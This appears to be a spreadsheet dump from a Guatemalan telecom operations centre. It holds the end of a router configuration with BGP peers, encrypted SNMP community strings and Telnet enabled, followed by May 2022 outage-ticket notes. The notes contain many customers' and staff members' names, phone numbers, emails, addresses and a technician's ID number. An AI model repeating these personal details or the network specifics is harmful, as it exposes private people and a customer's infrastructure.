 IP ADDRESS 10.10.50.1 255.255.255.0
#
INTERFACE ETHERNET0/0/0
#
INTERFACE ETHERNET0/0/1
 DESCRIPTION INTERFACE NO ESTA EN USO
 SHUTDOWN
#
INTERFACE ETHERNET0/0/2
 DESCRIPTION INTERFACE NO ESTA EN USO
 SHUTDOWN
#
INTERFACE ETHERNET0/0/3
 DESCRIPTION INTERFACE NO ESTA EN USO
 SHUTDOWN
#
INTERFACE ETHERNET0/0/4
 DESCRIPTION WAN PRINCIPAL/_/810900006T/_/
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 10
 IP ADDRESS 192.168.193.210 255.255.255.252
#
INTERFACE GIGABITETHERNET0/0/0
 MTU 1600
 DESCRIPTION INTERFACE NO ESTA EN USO
 SHUTDOWN
 TCP ADJUST-MSS 1200
 IP ADDRESS DHCP-ALLOC
#
INTERFACE CELLULAR0/0/0
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.194.56 255.255.255.255
#
INTERFACE LOOPBACK10
#
INTERFACE LOOPBACK502
 IP ADDRESS 10.13.150.205 255.255.255.255
#
BGP 65000
 PEER 192.168.193.209 AS-NUMBER 13682
 PEER 192.168.193.209 TIMER KEEPALIVE 5 HOLD 20
 PEER 192.168.193.209 TIMER CONNECT-RETRY 1
 PEER 192.168.193.209 CONNECT-INTERFACE ETHERNET0/0/4
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  IMPORT-ROUTE DIRECT
  IMPORT-ROUTE STATIC
  PEER 192.168.193.209 ENABLE
#
 INFO-CENTER TIMESTAMP LOG FORMAT-DATE
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB03F898EF715CD8
 SNMP-AGENT COMMUNITY READ %^%#G&amp;ZQI8LS&amp;A:ZICVF#S]G+{-YEW42RNG&amp;S=FSWT@HUMTBKS'BRF&lt;~+R'SY;INJ2WMJ#T-GYA@LO:R&gt;P7F%^%# ACL 2988
 SNMP-AGENT COMMUNITY READ %^%#NTNQH\^JZ~L{LP/9BZ&lt;H~]KU&amp;6R4I&gt;Q-Z4)O0+W/6&gt;QJHXD7J:AJAL'PX{XLX)Y}#{`_Y4NJXC%JBXZ'%^%#
 SNMP-AGENT SYS-INFO LOCATION 10 CALLE 0-74, GUATEMALA
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 STELNET SERVER ENABLE
 TELNET SERVER ENABLE
#
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
#
IP ROUTE-STATIC 192.168.1.0 255.255.255.0 192.168.193.209 DESCRIPTION HACIA_LAN_ZONA_4
IP ROUTE-STATIC 192.168.46.0 255.255.255.0 10.10.50.2 DESCRIPTION HACIA_LAN_ZONA_9
#
FIB REGULARLY-REFRESH DISABLE
#
USER-INTERFACE CON 0
 AUTHENTICATION-MODE AAA
 IDLE-TIMEOUT 5 5
 SCREEN-LENGTH 0
USER-INTERFACE VTY 0 4
 AUTHENTICATION-MODE AAA
 USER PRIVILEGE LEVEL 15
 IDLE-TIMEOUT 5 5
#
WLAN AC
#
 NTP-SERVICE SOURCE-INTERFACE LOOPBACK502
 NTP-SERVICE UNICAST-SERVER 10.10.4.100 PREFERENCE
 NTP-SERVICE UNICAST-PEER 10.10.4.100
#
OPS
#
AUTOSTART
#
RETURN</t>
  </si>
  <si>
    <t>CLIENTE RAMIRO CASTILLO 51960028 MENCIONA QUE SI CUENTAN CON ENERGIA ELECTRICA -ID 2001239196</t>
  </si>
  <si>
    <t>F4562532</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA INDICA QUE ELLOS NO PUEDEN VER LOS EQUIPOS Y QUE SE COMUNICARAN CON EL AREA DE SISTEMAS PARA QUE REVISEN ELLOS LOS EQUIPOS POR LO QUE SE SOLICITA QUE LLAMEN PARA TENER UNA FECHA APROXIMADA A LO QUE INDICA QUE ELLA SOLICITA NUMEROS DE CONTACTO
2001680888
COLA:
NOMBRE: A: 78429558
NÚMERO: 78429558
DURACIÓN: 0:05:21
ESTADO: CONECTADA
DETALLES: 78429558
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 16/05/2022 12:43:13</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR AL NUMERO DE JOHANA MEJIA 58917822 PROPORCIONADO PERO NO SE TIENE RESPUESTA
3001858512
COLA:
NOMBRE: A: 58917822
NÚMERO: 55280199
DURACIÓN: 0:01:02
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 19/05/2022 12:54:24</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA ATIENDE VANESA MORAN INDICA QUE POR LA DIRECCIONES SE TRATA DE UNA NUEVA AGENCIA QUE AUN NO CUENTA CON LINEA TELEFONICA Y PROPORCIONA NUMERO DE GERENTE JOHANA MEJIA 58917822
3001844947
COLA:
NOMBRE: A: 78429558
NÚMERO: 78429558
DURACIÓN: 0:02:01
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 78429558
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 19/05/2022 12:45:33</t>
  </si>
  <si>
    <t>SE LLAMA A LOS TELEFONOS ENCONTRADOS EN PAGINA WEB SIN EMBARGO ENVIA A BUZON.
3001249690
COLA:
NOMBRE: A: 78865484
NÚMERO: 78865484
DURACIÓN: 0:00:47
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 78865484
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 18/05/2022 16:31:36
3001249416
COLA:
NOMBRE: A: 78865978
NÚMERO: 78865978
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 78865978
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 18/05/2022 16:31:43</t>
  </si>
  <si>
    <t>F4562534</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO MARTINEZ /78082167 INDICA QUE ESTA EN UNA REUNION EN ESTE MOMENTO QUE NO ESTA EN EL SITIO PERO QUE EL YA REINICIO EQUIPO VERIFICO CONEXIONES Y NO LEVANTO || SE TRATA DE CONTACTAR A GESTOR PERO NO SE OBTIENE RESPUESTA || SE NOTIFICA PAR AEL SEGUIMIENTO  **
ID 2001293631
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO MARTINEZ /78082167 ENVIA A BUZON DIRECTO SE INTENTARA LUEGO **
ID 2001251841
**</t>
  </si>
  <si>
    <t>F4562580</t>
  </si>
  <si>
    <t>SE NOTIFICA  VIA CORREO AL CLIENTE
SOLICITUD DE SOPORTE ::: ID LOCAL IP2033160::: TICKET CNOC IMGMD005025::: "LINK DOWN"</t>
  </si>
  <si>
    <t>F4562583</t>
  </si>
  <si>
    <t>SE VALIDA LA CRONOLOGÍA DE LA FALLA Y NO SE VALIDA QUE SE TENGA ALGO PENDIENTES, NO HAY LLAMADAS AL PR O CORREO, Y LLEVA 1 HORAS SIN SEGUIMIENTO, POR LO QUE SE CAMBIA DE ESTADO YA QUE NO APLICA SE NOTIFICA AL GESTOR SAMUEL.ESTRADAG VÍA SKYPE</t>
  </si>
  <si>
    <t>F4562584</t>
  </si>
  <si>
    <t>SE TIENE A DANIEL EN LINEA QUIEN INDICA QUE HAN PRESENTADO CAIDAS..  SE VALIDA EVENTO EN SW DE ACCESO. CON TIEMPOS UN POCO ELEVADOS PARA EL RADIO EN CLIENTE. SE ESTARA LLAMANDO A CL A LAS 18:00 HORAS PARA VALIDAR SI PERSISTE CAIDAS Y VALIDAR SI RADIO DE UM CUENTA CON REINICIO Y/O DADO CASO VALIDAR SI ES NECESARIO REALIZAR VISITA-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL GAMEZ 63072349 MENCIONA QUE ESTA PRESENTANDO CAIDAS CADA HORA APROXIMADAMENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001286838</t>
  </si>
  <si>
    <t>F4562603</t>
  </si>
  <si>
    <t>SE PROCEDE A ENVIAR CORREO A CLIENTE PARA CONFIRMAR SI EXISTE POSIBLE CORTE DE ENERGÍA O MANTENIMIENTO. TICKET CAMBIA A ETAPA PENDIENTE CLIENTE.
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: VIERNES, 13 DE MAYO DE 2022 14:12
PARA: MONASTERIOAF@CHURCHOFJESUSCHRIST.ORG &lt;MONASTERIOAF@CHURCHOFJESUSCHRIST.ORG&gt;
CC: JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA@CLARO.COM.GT &lt;CNOCCA@CLARO.COM.GT&gt;; ANGEL.CLAVEL@CLARO.COM.GT &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; VICTOR HUGO GONZALEZ &lt;VICTORH.GONZALEZ@CLARO.COM.GT&gt;; JESICA IVON RODRIGUEZ LOPEZ &lt;JESICA.RODRIGUEZ@CLARO.COM.GT&gt;
ASUNTO: ENLACE ALARMADO CC_IJSUD_GT_EL_CENTRO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
TICKET: F4562603
ID: 349900120T
IDENTIFICADOR DEL CLIENTE: CC_IJSUD_GT_EL_CENTRO
UBICADO EN: INTERNET.- 5 AVENIDA 7-68 ZONA 01, HUEHUETENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4562616</t>
  </si>
  <si>
    <t>-* PABLO YAQUI 34505859 (CLIENTE) NO RESPONDE, SE LLAMARA LUEGO -
2001376036
2001376429</t>
  </si>
  <si>
    <t>F4562627</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE TERESA CRUZ PERO ENVIA A BUZON.
2001264541
COLA:
NOMBRE: A: 0050371601590
NÚMERO: 0050371601590
DURACIÓN: 0:00:16
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050371601590
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/05/2022 14:29:31</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE TERESA CRUZ INDICA QUE VA A UBICAR LOS EQUIPOS YA QUE NO SABE DONDE ESTAN UBICADOS.
2001264801
COLA:
NOMBRE: A: 0050322645211
NÚMERO: 0050322645211
DURACIÓN: 0:01:02
ESTADO: CONECTADA
DETALLES: 0050322645211
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/05/2022 14:31:13</t>
  </si>
  <si>
    <t>F4562636</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAYANA BRIZUELA 95771765 MENCIONA QUE EL HORARIO ES HASTA LAS 16:00 HRS POR LO QUE SOLICITA SE PUEDA REALIZAR LA VISITA EL DIA LUNES A PARTIR DE LAS 8:00
-ID 2001290639</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 95771765 PARA VALIDAR LA DIRECCION
UBICACIÓN: BARRIO EL CALVARIO, FRENTE A LA MUNICIPALIDAD SANTA ROSA DE COPAN
HORARIO: 8:00 - 16:00</t>
  </si>
  <si>
    <t>F4562643</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTIVO
KENNY ROBERT RIVERA JUAREZ
VIE 13/05/2022 14:39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2643
ID: 313900406T
IDENTIFICADOR DEL CLIENTE: CC_GMG_GT_INTERNET_CUBULCO_BAJAVERAPAZ
UBICADO EN:   INTERNET_AVE. BARRIO SNTIAGO 1-68 ZONA 1 CUBULCO BAJA VERAPAZ BAJA VERAPAZ CUBULCO 15.103621, -90.62
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4562649</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE NOTIFICADO QUE SE TIENE PING EXTENDIDO
257700006T - INDUSTRIAS LACTEAS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS PEREZ 47484683 RESPONDE CALOS JOLON, MENCIONA QUE LO QUE ESTAN SOLICITANDO SON LAS GRAFICAS DEL SERVICIO YA QUE PIERDEN CONEXION MUY SEGUIDO   -- CARLOS.JOLON@INLACSA.COM --
SE NOTIFICARA PARA VALIDAR SI SE CUENTA CON ESAS GRAFICAS
-ID 2001274681</t>
  </si>
  <si>
    <t>F4562682</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A CLIENTE WILLIAM , QUIEN REALIZA PRUEBAS
2001287559
COLA:
NOMBRE: A: 0050584208328
NÚMERO: 0050584208328
DURACIÓN: 0:05:07
ESTADO: CONECTADA
DETALLES: 0050584208328
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/05/2022 15:46:58</t>
  </si>
  <si>
    <t>F4562700</t>
  </si>
  <si>
    <t>CLIENTE CONFIRMA VISITA PARA EL DÍA LUNES 11 AM || supervisor David Montenegro 58263058 enterado de visita
OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;
VIE 13/05/2022 17:07
asunto: VISITA TÉCNICA ATM4110 || UBICACIÓN: HOSPITAL MILITAR ZONA 16 - FINCA EL PALOMAR, ACATAN ZONA 16
BUEN DIA
CONFIRMADA LA VISITA DE ATM 4110
ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;
VIE 13/05/2022 17:01
asunto: VISITA TÉCNICA ATM4110 || UBICACIÓN: HOSPITAL MILITAR ZONA 16 - FINCA EL PALOMAR, ACATAN ZONA 16
TAVSA BUENA TARDE SU APOYO CON ESTA COORDINACIÓN.
SALUDOS CORDIALES,
WILLIAM ORLANDO RAMIREZ V.
    ¡5B UNA TRAYECTORIA DE CONFIANZA, UN FUTURO DE INNOVACIÓN!
ANALISTA DE ATMS
PBX:(502) 2420-7200 EXT. 2359
CELULAR 55899701
ORAMIREZ@5B.COM.GT
WWW.5B.COM.GT</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B CONTESTA HECTOR EL CUAL COMENTA QUE NO SE TIENEN MANTENIMIENTOS SOBRE EL CAJERO ADICIONAL SE VALIDA QUE SECTOR CUENTA CON ENERGIA ELECTRICA,  POR TEMA DE REINICIDENCIA SE RECOMIENDA REALIZAR VISITA EN CONJUNTO PARA CERTIFICAR MEDIO DEBIDO A QUE ESTAN SUBIENDO ERRORES EN EL PUERTO DE MSAN HACIA TELDAT.
2001281853
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:04:42
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 13/05/2022 15:28:29</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A TYT A LA ESPERA CONFIRMEN VISITA EN CONJUNTO PARA LUNES 11 AM ||
ERITO FERNANDO TECU XITUMUL
VIE 13/05/2022 16:54
ASUNTO: VISITA TÉCNICA ATM4110 || UBICACIÓN: HOSPITAL MILITAR ZONA 16 - FINCA EL PALOMAR, ACATAN ZONA 16
BUENA TARDE ESTIMADOS 5B.
EN SEGUIMIENTO AL SERVICIO ATM4110 || UBICACIÓN: (ATM 4110) HOSPITAL MILITAR ZONA 16 - FINCA EL PALOMAR, ACATAN ZONA 16, SANTA ROSITA. LE COMENTO QUE POR MONITOREO PROACTIVO SE TIENE ALARMADO EL SERVICIO POR LO CUAL SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR UNA VISITA EN CONJUNTO PARA APERTURA DEL ATM Y PODER VERIFICAR LOS EQUIPOS Y EL MEDIO, EL DÍA LUNES 16/05 A LAS 11:00 HRS.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL ASIGNADO.</t>
  </si>
  <si>
    <t>F4562701</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BEATRIZ GUEVARA 33032070 MENCIONA QUE ESTARA ESCALANDO CON SU IT
-ID 2001298653</t>
  </si>
  <si>
    <t>F4562722</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARMANDO CHUC PARA VALIDAR SERVICIO COMENTA QUE YA CUENTA CON SERVICIO, SE LE BRINDA INFORMACION SOBRE EL INCIDENTE QUEDA ENTERADO Y BRINDA CIERRE DE FALLA
2001334800
COLA:
NOMBRE: A: 35731989
NÚMERO: 35731989
DURACIÓN: 0:02:14
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 35731989
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 13/05/2022 19:47:46</t>
  </si>
  <si>
    <t>F4562725</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A CLIENTE PERO NO SE TIENE RESPUESTA
2001919346
COLA:
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:01:22
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 17/05/2022 12:19:57
2001920983
COLA:
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:01:15
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 17/05/2022 12:25:11</t>
  </si>
  <si>
    <t>F4562733</t>
  </si>
  <si>
    <t>SE CONSULTA EN EL GRUPO BANCO AZTECA PROACTIVO.</t>
  </si>
  <si>
    <t>F4562743</t>
  </si>
  <si>
    <t>DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 13 DE MAYO DE 2022 17:33PARA: MESA.DE.SERVICIO@BAM.COM.GT &lt;MESA.DE.SERVICIO@BAM.COM.GT&gt;; LUIS.VALLE@BAM.COM.GT &lt;LUIS.VALLE@BAM.COM.GT&gt;; CARLOS.RAMOS@BAM.COM.GT &lt;CARLOS.RAMOS@BAM.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_BAM_GT_AGENCIA_227"
ESTIMADO CLIENTE:
LE SALUDO CORDIALMENTE, ASÍ MISMO INFORMAMOS QUE TENEMOS UNA ALARMA PROACTIVA  CON RESPECTO AL SIGUIENTE SERVICIO EL CUAL ESTA SIENDO AFECTADO POR FALLA EN UN EQUIPO DE ACCESO, LE BRINDAREMOS MÁS INFORMACIÓN AL RESPECTO EN BREVE.
MASIVA: F4562770
TICKET: F4562743
ID: 7300173T
IDENTIFICADOR DEL CLIENTE: CC_BAM_GT_AGENCIA_227
UBICADO EN: 5 AVENIDA 3-050 ZONA 1 PAJAPITA SAN MARCOS
SALUDOS</t>
  </si>
  <si>
    <t>F4562750</t>
  </si>
  <si>
    <t>VALIDA VIA SKYPE SERGIO PINEDA</t>
  </si>
  <si>
    <t>F4562758</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2420-7200 CONTESTA EL SEÑOR FREDY  INDICA QUE LOS TIEMPOS AUN SIGUEN IGUAL || SE NOTIFICA A GESTOR **
ID 2001579455
**</t>
  </si>
  <si>
    <t>F4562772</t>
  </si>
  <si>
    <t>SE LLAMO NUEVAMENTE AL LIC. FLORES PERO ENVIA A BUZON.
SE DARA SEGUIMIENTO EL DIA DE MAÑANA EN HORARIO HABIL.
2001321777
COLA:
NOMBRE: A: 0050378615870
NÚMERO: 0050378615870
DURACIÓN: 0:00:06
ESTADO: CONECTADA
DETALLES: 0050378615870
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/05/2022 17:59:01</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LIC FLORES 78615870 ENVIA DIRECTAMENTE A BUZON
-ID 2001587128</t>
  </si>
  <si>
    <t>CLIENTE  LIC FLORES 78615870 SIGUE SIN CONTESTAR, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>PERO NOS MANDA A BUZON EN TRES OCASIONES, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLMAADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  LIC FLORES 78615870 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON CHAVARRIA 77529931 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA LAS 12:00 HRS
-ID 2001587327</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GERSON CHAVARRIA 77529931 MENCIONA QUE PERSISTE EL INCONVENIENTE, POR LO QUE SE SOLICITAN DATOS DE VISITA TECNICA
-ID 2001684791
PWR - VERDE
SYNC - ANARANJADO
ALM - ANARANJADO
E1 - ROJO
ALARMA - ROJO
NOMBRE DEL CLIENTE: UNIVERSIDAD DE SONSONATE
UBICACIÓN: CALLE INGERIERO JESUS ALBERTO DIAS AVENIDA CENTRAL FINAL COLONIA 14 DE DICIEMBRE SONSONATE
CONTACTO EN SITIO: GERSON CHAVARRIA 77529931
HORARIO DE ATENCION: 8:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LIC FLORES 78615870 ##NO CONTESTA ##ENVIA DIRECTO A BUZON-##
2001494603
COLA:
NOMBRE: A: 0050378615870
NÚMERO: 0050378615870
DURACIÓN: 0:00:07
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378615870
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 15/05/2022 07:25:00
2001494618
COLA:
NOMBRE: A: 0050378615870
NÚMERO: 0050378615870
DURACIÓN: 0:00:12
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378615870
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 15/05/2022 07:25:05</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON CHAVARRIA 77529931 MENCIONA QUE AUN NO HA LLEGADO A PR POR LO QUE SOLICITA LLAMADA EN 25 MIN
-ID 2001671453</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON CHAVARRIA 77529931 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001723050</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LIC FLORES 78615870 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 2001722581</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LIC. FLORES PERO ENVIA BUZON.
2001314076
COLA:
NOMBRE: A: 0050378615870
NÚMERO: 0050378615870
DURACIÓN: 0:00:07
ESTADO: CONECTADA
DETALLES: 0050378615870
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/05/2022 17:18:29</t>
  </si>
  <si>
    <t>F4562789</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARLENI MENDEZ, QUIEN VA APOYAR A PAGAR EL AETHRA.
2001310539
COLA:
NOMBRE: A: 46311585
NÚMERO: 011 50246311585
DURACIÓN: 0:00:13
ESTADO: CONECTADA
DETALLES: +50246311585
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/05/2022 17:02:24</t>
  </si>
  <si>
    <t>F4562795</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO AL CLIENTE PARA GESTIONAR PERMISOS
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 17 DE MAYO DE 2022 11:33
PARA: JSCHIAPAS@MINFIN.GOB.GT &lt;JSCHIAPAS@MINFIN.GOB.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | DIRECCION DE TECNOLOGIAS DE LA INFORMACION. |947900001T| INTERNET_ 8 AVE. 20-59 Z.1 NIVEL 6 EDIFICIO MINISTERIO DE FINANZAS PUBLICAS GUATEMALA GUATEMALA
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO DIRECCION DE TECNOLOGIAS DE LA INFORMACION. |947900001T| INTERNET_ 8 AVE. 20-59 Z.1 NIVEL 6 EDIFICIO MINISTERIO DE FINANZAS PUBLICAS GUATEMALA GUATEMALA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO PARA EL DÍA DE MAÑANA 18/05/2022 A LAS 8 AM.
TECNICO:
NOMBRE                                                              IBM                      DPI                    PLACA
IVAN ARRAZOLA                                                951013       2319 45019 0101   P-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QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LE RESPONDE CORREO AL CLIENTE CON DATOS DE EL PERSONAL NUEVAMENTE
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 7:58
PARA: JOSUÉ SALVADOR CHIAPAS ÁLVAREZ &lt;JSCHIAPAS@MINFIN.GOB.GT&gt;; LAURA MELIZA LOPEZ CHACON &lt;LAURAM.LOPEZ@CLARO.COM.GT&gt;; BYRON SAUL GONZALEZ GARCIA &lt;BYRON.GONZALEZ@CLARO.COM.GT&gt;
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
ASUNTO: RE: GESTIÓN DE PERMISOS | DIRECCION DE TECNOLOGIAS DE LA INFORMACION. |947900001T| INTERNET_ 8 AVE. 20-59 Z.1 NIVEL 6 EDIFICIO MINISTERIO DE FINANZAS PUBLICAS GUATEMALA GUATEMALA
BUEN DÍA ESTIMADOS.
ESTOS SERÍAN LOS TÉCNICOS QUE IRÁN AL SITIO A REVISIÓN DE LA FALLA.
TECNICO:
NOMBRE                                                              IBM                      DPI                    PLACA
IVAN ARRAZOLA                                                951013       2319 45019 0101   P-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SALUDOS CORDIALES
DE: JOSUÉ SALVADOR CHIAPAS ÁLVAREZ &lt;JSCHIAPAS@MINFIN.GOB.GT&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 17:25
PARA: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; LAURA MELIZA LOPEZ CHACON &lt;LAURAM.LOPEZ@CLARO.COM.GT&gt;; BYRON SAUL GONZALEZ GARCIA &lt;BYRON.GONZALEZ@CLARO.COM.GT&gt;
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
ASUNTO: RE: GESTIÓN DE PERMISOS | DIRECCION DE TECNOLOGIAS DE LA INFORMACION. |947900001T| INTERNET_ 8 AVE. 20-59 Z.1 NIVEL 6 EDIFICIO MINISTERIO DE FINANZAS PUBLICAS GUATEMALA GUATEMALA
BUENA TARDE.
LES INFORMO QUE NO SE RECIBIÓ LOS DATOS DE LAS DOS PERSONAS QUE PUEDEN INGRESAR A NUESTRAS INSTALACIONES, AÚN ESTOY A LA ESPERA PARA PODER GESTIONARLES EL PASE DE INGRESO.
QUEDO ATENTO A SUS NOTICIAS.
SALUDOS.
M.SC. JOSUÉ SALVADOR CHIAPAS ÁLVAREZ
JEFE DEL DEPARTAMENTO DE TELECOMUNICACIONES
DIRECCIÓN DE TECNOLOGÍAS DE LA INFORMACIÓN
MINISTERIO DE FINANZAS PÚBLICAS
8A. AVENIDA 20-59 ZONA 1, CENTRO CÍVICO
(502)  2374-3000 EXT. 10616
WWW.MINFIN.GOB.GT</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DEL CLIENTE AUTORIZANDO VISITA Y INGRESO SOLO A TECNICO JOSE ANGEL SANDOVAL POR MEDIDAS DE SEGURIDAD
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 9:06
